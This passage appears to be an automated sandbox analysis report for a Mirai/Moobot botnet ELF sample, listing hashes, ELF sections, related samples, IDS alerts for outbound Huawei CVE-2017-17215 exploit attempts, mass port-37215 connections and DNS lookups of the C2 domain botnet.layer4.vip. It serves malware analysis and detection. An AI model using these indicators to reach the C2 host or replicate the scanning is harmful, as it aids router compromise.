                              157.2.248.90cNodufKYLc.elfGet hashmaliciousMirai, MoobotBrowse
                                197.92.242.213mYE3Hp4M1CGet hashmaliciousMiraiBrowse
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SAIX-NETZAnb8goZB2CP.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.198.64.100
                                  2H9CS3EOGd.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.151.178.149
                                  xeyYW7Sk01.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.150.35.159
                                  29hgFPe8IR.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.145.207.242
                                  BVnG1daMQK.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.151.178.192
                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.145.22.72
                                  abcdb0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousMiraiBrowse
                                  • 41.148.201.194
                                  yagi.x86.elfGet hashmaliciousMiraiBrowse
                                  • 41.145.255.135
                                  ovnhzJz4lW.elfGet hashmaliciousMoobotBrowse
                                  • 41.149.203.26
                                  w0iBC3u0H7.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.150.141.244
                                  Lltm9nfneM.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.149.186.177
                                  we6cfmBa7X.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.150.105.10
                                  OC5TUkV4uu.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.145.22.76
                                  k2O9S4yYbT.elfGet hashmaliciousMiraiBrowse
                                  • 102.254.127.150
                                  47Ju5T1TBj.elfGet hashmaliciousMiraiBrowse
                                  • 102.253.30.23
                                  3D82Y2f9fa.elfGet hashmaliciousMiraiBrowse
                                  • 41.148.201.135
                                  4UU3hYu3wi.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.145.34.74
                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.149.186.110
                                  eMF7qAtccy.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.151.3.247
                                  NHAZ9jvqo9.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 41.198.64.116
                                  FUNDACAOINSTITUTOOSWALDOCRUZBRxvK58QIUk6.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.112.182
                                  xeyYW7Sk01.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.160.99
                                  x86.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.95.203
                                  w0iBC3u0H7.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.200.184
                                  4MLVDymThV.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.137.208
                                  OC5TUkV4uu.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.247.109
                                  9uT5Pd2lBi.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.137.202
                                  MWh3yNT57z.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.247.105
                                  o8YVsZ3s65.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.184.36
                                  HXDkgq1EXO.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.95.230
                                  4n3AoHAMVV.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.74.240
                                  Ryy75r0ahx.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.47.12
                                  DVYf0GsYDZ.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.196.29
                                  Wk8vyWIbBx.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.184.97
                                  RCNpn4iJl2.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.196.69
                                  kpC3hp4NN3.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.89.122
                                  Bxid3U8ebF.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.17.131
                                  05vZ7N94q0.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.87.116.217
                                  CUqSE7qs3x.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.11.98
                                  AjHXnhM67c.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 157.86.159.171
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                  Entropy (8bit):6.193017165924847
                                  TrID:
                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                  File name:k9fBkBGZNf.elf
                                  File size:67312
                                  MD5:a8e8bff63996bf0d6b7f50021e8f9182
                                  SHA1:325df08762f845634d89148773b61484c72bd826
                                  SHA256:424e056761997d0df0dbc2cdb5b8d0fb2295143902e89dc718c5d7caeb340e3e
                                  SHA512:9e2e36f72ac209fcf47ba8f8b15b2f7999ad0220e81ecd56e52133ca3ca83f4e949901ce02ec4867b7c52091e72597ee2b8a62762ad0aed26279cd04f2a7fe13
                                  SSDEEP:1536:lGBVg7AOotXhGIAsQ/VJATQsQm75YH/tatCV:lSCz5L4QmVN4V
                                  TLSH:4E633A21BA761E1BC0C1947621F74B25B2F143CA26ECCA0A3DB20D9EFF71A446543AF5
                                  File Content Preview:.ELF...........................4...`.....4. ...(.......................................................t..%.........dt.Q................................@..(....@.8[................#.....a ..`.....!.....!...@.....".........`......$!...!...@...........`....

                                  ELF header

                                  Class:
                                  Data:
                                  Version:
                                  Machine:
                                  Version Number:
                                  Type:
                                  OS/ABI:
                                  ABI Version:
                                  Entry Point Address:
                                  Flags:
                                  ELF Header Size:
                                  Program Header Offset:
                                  Program Header Size:
                                  Number of Program Headers:
                                  Section Header Offset:
                                  Section Header Size:
                                  Number of Section Headers:
                                  Header String Table Index:
                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                  NULL0x00x00x00x00x0000
                                  .initPROGBITS0x100940x940x1c0x00x6AX004
                                  .textPROGBITS0x100b00xb00xe1a40x00x6AX004
                                  .finiPROGBITS0x1e2540xe2540x140x00x6AX004
                                  .rodataPROGBITS0x1e2680xe2680x1f400x00x2A008
                                  .ctorsPROGBITS0x301ac0x101ac0x80x00x3WA004
                                  .dtorsPROGBITS0x301b40x101b40x80x00x3WA004
                                  .dataPROGBITS0x301c00x101c00x3600x00x3WA008
                                  .bssNOBITS0x305200x105200x22200x00x3WA008
                                  .shstrtabSTRTAB0x00x105200x3e0x00x0001
                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                  LOAD0x00x100000x100000x101a80x101a86.23140x5R E0x10000.init .text .fini .rodata
                                  LOAD0x101ac0x301ac0x301ac0x3740x25942.64040x6RW 0x10000.ctors .dtors .data .bss
                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                  Download Network PCAP: filteredfull

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.2341.237.11.13745808372152835222 04/09/23-03:31:34.699902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580837215192.168.2.2341.237.11.137
                                  192.168.2.23197.39.194.10559212372152835222 04/09/23-03:32:04.712759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921237215192.168.2.23197.39.194.105
                                  192.168.2.2334.160.72.9546694372152835222 04/09/23-03:30:55.062197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669437215192.168.2.2334.160.72.95
                                  192.168.2.2341.239.25.9960888372152835222 04/09/23-03:31:57.425188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6088837215192.168.2.2341.239.25.99
                                  192.168.2.23197.246.253.22847280372152835222 04/09/23-03:31:16.992421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728037215192.168.2.23197.246.253.228
                                  192.168.2.23197.214.96.15141644372152835222 04/09/23-03:32:15.164399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164437215192.168.2.23197.214.96.151
                                  192.168.2.23155.138.39.3441442372152835222 04/09/23-03:32:22.532628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144237215192.168.2.23155.138.39.34
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 9, 2023 03:30:28.719002008 CEST460637215192.168.2.2339.190.184.244
                                  Apr 9, 2023 03:30:28.719173908 CEST460637215192.168.2.2341.174.49.12
                                  Apr 9, 2023 03:30:28.719352961 CEST460637215192.168.2.23157.194.69.244
                                  Apr 9, 2023 03:30:28.719352961 CEST460637215192.168.2.2341.134.182.194
                                  Apr 9, 2023 03:30:28.719364882 CEST460637215192.168.2.23202.142.6.156
                                  Apr 9, 2023 03:30:28.719369888 CEST460637215192.168.2.2341.199.133.76
                                  Apr 9, 2023 03:30:28.719454050 CEST460637215192.168.2.2341.3.147.33
                                  Apr 9, 2023 03:30:28.719484091 CEST460637215192.168.2.2361.210.35.35
                                  Apr 9, 2023 03:30:28.719677925 CEST460637215192.168.2.2341.166.240.54
                                  Apr 9, 2023 03:30:28.719721079 CEST460637215192.168.2.23197.33.178.9
                                  Apr 9, 2023 03:30:28.719758987 CEST460637215192.168.2.2341.213.207.26
                                  Apr 9, 2023 03:30:28.719829082 CEST460637215192.168.2.23193.137.56.102
                                  Apr 9, 2023 03:30:28.719858885 CEST460637215192.168.2.23157.47.228.24
                                  Apr 9, 2023 03:30:28.720084906 CEST460637215192.168.2.2341.1.26.86
                                  Apr 9, 2023 03:30:28.720093966 CEST460637215192.168.2.23157.72.51.40
                                  Apr 9, 2023 03:30:28.720146894 CEST460637215192.168.2.23157.227.189.87
                                  Apr 9, 2023 03:30:28.720174074 CEST460637215192.168.2.23197.113.138.207
                                  Apr 9, 2023 03:30:28.720174074 CEST460637215192.168.2.23157.56.68.128
                                  Apr 9, 2023 03:30:28.720227957 CEST460637215192.168.2.23197.184.59.100
                                  Apr 9, 2023 03:30:28.720423937 CEST460637215192.168.2.23197.219.199.116
                                  Apr 9, 2023 03:30:28.720426083 CEST460637215192.168.2.23157.0.102.4
                                  Apr 9, 2023 03:30:28.720453978 CEST460637215192.168.2.2341.216.102.42
                                  Apr 9, 2023 03:30:28.720460892 CEST460637215192.168.2.23197.71.87.26
                                  Apr 9, 2023 03:30:28.720483065 CEST460637215192.168.2.23197.194.244.218
                                  Apr 9, 2023 03:30:28.720557928 CEST460637215192.168.2.23197.241.218.88
                                  Apr 9, 2023 03:30:28.720561981 CEST460637215192.168.2.2341.122.226.207
                                  Apr 9, 2023 03:30:28.720639944 CEST460637215192.168.2.2341.135.200.90
                                  Apr 9, 2023 03:30:28.720679998 CEST460637215192.168.2.23197.60.46.17
                                  Apr 9, 2023 03:30:28.720802069 CEST460637215192.168.2.2347.189.81.161
                                  Apr 9, 2023 03:30:28.720808983 CEST460637215192.168.2.23197.49.109.239
                                  Apr 9, 2023 03:30:28.720834970 CEST460637215192.168.2.23197.50.105.242
                                  Apr 9, 2023 03:30:28.720875978 CEST460637215192.168.2.23157.132.9.21
                                  Apr 9, 2023 03:30:28.720973969 CEST460637215192.168.2.23157.111.36.33
                                  Apr 9, 2023 03:30:28.720979929 CEST460637215192.168.2.23197.134.30.249
                                  Apr 9, 2023 03:30:28.721019030 CEST460637215192.168.2.23157.32.199.80
                                  Apr 9, 2023 03:30:28.721147060 CEST460637215192.168.2.23197.96.78.163
                                  Apr 9, 2023 03:30:28.721220970 CEST460637215192.168.2.2341.78.39.89
                                  Apr 9, 2023 03:30:28.721242905 CEST460637215192.168.2.23205.28.15.181
                                  Apr 9, 2023 03:30:28.721246004 CEST460637215192.168.2.23197.158.237.161
                                  Apr 9, 2023 03:30:28.721283913 CEST460637215192.168.2.23157.73.152.98
                                  Apr 9, 2023 03:30:28.721432924 CEST460637215192.168.2.23165.234.158.91
                                  Apr 9, 2023 03:30:28.721507072 CEST460637215192.168.2.238.117.135.33
                                  Apr 9, 2023 03:30:28.721517086 CEST460637215192.168.2.2341.152.194.32
                                  Apr 9, 2023 03:30:28.721539974 CEST460637215192.168.2.2341.139.135.181
                                  Apr 9, 2023 03:30:28.721584082 CEST460637215192.168.2.23174.225.217.106
                                  Apr 9, 2023 03:30:28.721636057 CEST460637215192.168.2.23157.188.73.120
                                  Apr 9, 2023 03:30:28.721824884 CEST460637215192.168.2.23197.217.83.244
                                  Apr 9, 2023 03:30:28.721837997 CEST460637215192.168.2.23153.236.87.145
                                  Apr 9, 2023 03:30:28.721841097 CEST460637215192.168.2.23197.187.164.4
                                  Apr 9, 2023 03:30:28.721862078 CEST460637215192.168.2.23197.115.247.20
                                  Apr 9, 2023 03:30:28.721863031 CEST460637215192.168.2.23197.66.42.254
                                  Apr 9, 2023 03:30:28.721903086 CEST460637215192.168.2.23197.76.48.235
                                  Apr 9, 2023 03:30:28.721939087 CEST460637215192.168.2.23157.186.107.147
                                  Apr 9, 2023 03:30:28.721988916 CEST460637215192.168.2.23157.192.123.6
                                  Apr 9, 2023 03:30:28.722026110 CEST460637215192.168.2.2341.89.195.15
                                  Apr 9, 2023 03:30:28.722062111 CEST460637215192.168.2.2362.251.10.155
                                  Apr 9, 2023 03:30:28.722088099 CEST460637215192.168.2.2341.62.214.218
                                  Apr 9, 2023 03:30:28.722131968 CEST460637215192.168.2.23157.122.70.129
                                  Apr 9, 2023 03:30:28.722178936 CEST460637215192.168.2.23157.20.181.40
                                  Apr 9, 2023 03:30:28.722207069 CEST460637215192.168.2.2387.116.193.183
                                  Apr 9, 2023 03:30:28.722291946 CEST460637215192.168.2.23157.114.179.24
                                  Apr 9, 2023 03:30:28.722351074 CEST460637215192.168.2.23188.125.136.73
                                  Apr 9, 2023 03:30:28.722385883 CEST460637215192.168.2.2394.185.96.191
                                  Apr 9, 2023 03:30:28.722425938 CEST460637215192.168.2.23197.210.216.134
                                  Apr 9, 2023 03:30:28.722613096 CEST460637215192.168.2.23157.156.4.107
                                  Apr 9, 2023 03:30:28.722630978 CEST460637215192.168.2.2341.94.128.71
                                  Apr 9, 2023 03:30:28.722635984 CEST460637215192.168.2.23192.130.98.190
                                  Apr 9, 2023 03:30:28.722769022 CEST460637215192.168.2.23157.241.180.86
                                  Apr 9, 2023 03:30:28.722769022 CEST460637215192.168.2.23157.199.139.237
                                  Apr 9, 2023 03:30:28.722826004 CEST460637215192.168.2.232.86.120.67
                                  Apr 9, 2023 03:30:28.722834110 CEST460637215192.168.2.23197.169.107.40
                                  Apr 9, 2023 03:30:28.722930908 CEST460637215192.168.2.23160.170.157.150
                                  Apr 9, 2023 03:30:28.723026037 CEST460637215192.168.2.23157.83.237.192
                                  Apr 9, 2023 03:30:28.723026037 CEST460637215192.168.2.23170.124.88.176
                                  Apr 9, 2023 03:30:28.723043919 CEST460637215192.168.2.2386.98.184.154
                                  Apr 9, 2023 03:30:28.723073006 CEST460637215192.168.2.2346.46.28.245
                                  Apr 9, 2023 03:30:28.723102093 CEST460637215192.168.2.2341.123.235.135
                                  Apr 9, 2023 03:30:28.723155975 CEST460637215192.168.2.23157.112.25.136
                                  Apr 9, 2023 03:30:28.723231077 CEST460637215192.168.2.23197.21.216.46
                                  Apr 9, 2023 03:30:28.723443031 CEST460637215192.168.2.2341.91.93.8
                                  Apr 9, 2023 03:30:28.723444939 CEST460637215192.168.2.23205.83.102.2
                                  Apr 9, 2023 03:30:28.723457098 CEST460637215192.168.2.23197.127.236.117
                                  Apr 9, 2023 03:30:28.723542929 CEST460637215192.168.2.2341.67.236.199
                                  Apr 9, 2023 03:30:28.723592997 CEST460637215192.168.2.23145.67.11.186
                                  Apr 9, 2023 03:30:28.723638058 CEST460637215192.168.2.2341.168.224.210
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 9, 2023 03:30:28.693165064 CEST192.168.2.238.8.8.80xa4f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.718728065 CEST192.168.2.238.8.8.80xa4f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.734724045 CEST192.168.2.238.8.8.80xa4f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.759145021 CEST192.168.2.238.8.8.80xa4f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.774879932 CEST192.168.2.238.8.8.80xa4f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.800762892 CEST192.168.2.238.8.8.80x6af1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.816415071 CEST192.168.2.238.8.8.80x6af1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.840477943 CEST192.168.2.238.8.8.80x6af1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.864578009 CEST192.168.2.238.8.8.80x6af1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.880831957 CEST192.168.2.238.8.8.80x6af1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.896595955 CEST192.168.2.238.8.8.80x3ed0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.912698984 CEST192.168.2.238.8.8.80x3ed0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.928909063 CEST192.168.2.238.8.8.80x3ed0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.944899082 CEST192.168.2.238.8.8.80x3ed0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.969042063 CEST192.168.2.238.8.8.80x3ed0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:28.993648052 CEST192.168.2.238.8.8.80x2da7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.009979963 CEST192.168.2.238.8.8.80x2da7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.034173965 CEST192.168.2.238.8.8.80x2da7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.058624983 CEST192.168.2.238.8.8.80x2da7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.074604988 CEST192.168.2.238.8.8.80x2da7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.099359035 CEST192.168.2.238.8.8.80xad34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.115001917 CEST192.168.2.238.8.8.80xad34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.130671978 CEST192.168.2.238.8.8.80xad34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.155224085 CEST192.168.2.238.8.8.80xad34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.171236992 CEST192.168.2.238.8.8.80xad34Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.195545912 CEST192.168.2.238.8.8.80xc189Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.220062017 CEST192.168.2.238.8.8.80xc189Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.235726118 CEST192.168.2.238.8.8.80xc189Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.264607906 CEST192.168.2.238.8.8.80xc189Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.280272007 CEST192.168.2.238.8.8.80xc189Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.305217028 CEST192.168.2.238.8.8.80xa8b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.320900917 CEST192.168.2.238.8.8.80xa8b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.346349955 CEST192.168.2.238.8.8.80xa8b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.362633944 CEST192.168.2.238.8.8.80xa8b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.378437042 CEST192.168.2.238.8.8.80xa8b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.394220114 CEST192.168.2.238.8.8.80x2192Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.410007954 CEST192.168.2.238.8.8.80x2192Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.434556961 CEST192.168.2.238.8.8.80x2192Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.450582027 CEST192.168.2.238.8.8.80x2192Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.466612101 CEST192.168.2.238.8.8.80x2192Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.491060019 CEST192.168.2.238.8.8.80xf83bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.507010937 CEST192.168.2.238.8.8.80xf83bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.522640944 CEST192.168.2.238.8.8.80xf83bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.547013044 CEST192.168.2.238.8.8.80xf83bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.562836885 CEST192.168.2.238.8.8.80xf83bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.587160110 CEST192.168.2.238.8.8.80xda54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.611777067 CEST192.168.2.238.8.8.80xda54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.627706051 CEST192.168.2.238.8.8.80xda54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.643665075 CEST192.168.2.238.8.8.80xda54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.659786940 CEST192.168.2.238.8.8.80xda54Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.684818983 CEST192.168.2.238.8.8.80xa58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.708978891 CEST192.168.2.238.8.8.80xa58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.724841118 CEST192.168.2.238.8.8.80xa58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.749190092 CEST192.168.2.238.8.8.80xa58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.764987946 CEST192.168.2.238.8.8.80xa58aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.789679050 CEST192.168.2.238.8.8.80xdebeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.814152956 CEST192.168.2.238.8.8.80xdebeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.838406086 CEST192.168.2.238.8.8.80xdebeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.862952948 CEST192.168.2.238.8.8.80xdebeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.878663063 CEST192.168.2.238.8.8.80xdebeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.903088093 CEST192.168.2.238.8.8.80xf254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.918567896 CEST192.168.2.238.8.8.80xf254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.943022966 CEST192.168.2.238.8.8.80xf254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.967278957 CEST192.168.2.238.8.8.80xf254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.983313084 CEST192.168.2.238.8.8.80xf254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:29.999474049 CEST192.168.2.238.8.8.80x3c21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.015386105 CEST192.168.2.238.8.8.80x3c21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.039948940 CEST192.168.2.238.8.8.80x3c21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.064168930 CEST192.168.2.238.8.8.80x3c21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.089103937 CEST192.168.2.238.8.8.80x3c21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.104844093 CEST192.168.2.238.8.8.80x7fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.128969908 CEST192.168.2.238.8.8.80x7fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.154257059 CEST192.168.2.238.8.8.80x7fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.170732021 CEST192.168.2.238.8.8.80x7fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.194879055 CEST192.168.2.238.8.8.80x7fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.219254017 CEST192.168.2.238.8.8.80xbf68Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.243829012 CEST192.168.2.238.8.8.80xbf68Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.259797096 CEST192.168.2.238.8.8.80xbf68Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.275373936 CEST192.168.2.238.8.8.80xbf68Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.305361986 CEST192.168.2.238.8.8.80xbf68Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.329957008 CEST192.168.2.238.8.8.80xc1d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.345757961 CEST192.168.2.238.8.8.80xc1d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.369954109 CEST192.168.2.238.8.8.80xc1d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.385937929 CEST192.168.2.238.8.8.80xc1d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.410120964 CEST192.168.2.238.8.8.80xc1d1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.425838947 CEST192.168.2.238.8.8.80x4b3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.441818953 CEST192.168.2.238.8.8.80x4b3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.466763973 CEST192.168.2.238.8.8.80x4b3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.482618093 CEST192.168.2.238.8.8.80x4b3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.498140097 CEST192.168.2.238.8.8.80x4b3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:30.514239073 CEST192.168.2.238.8.8.80x9dfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
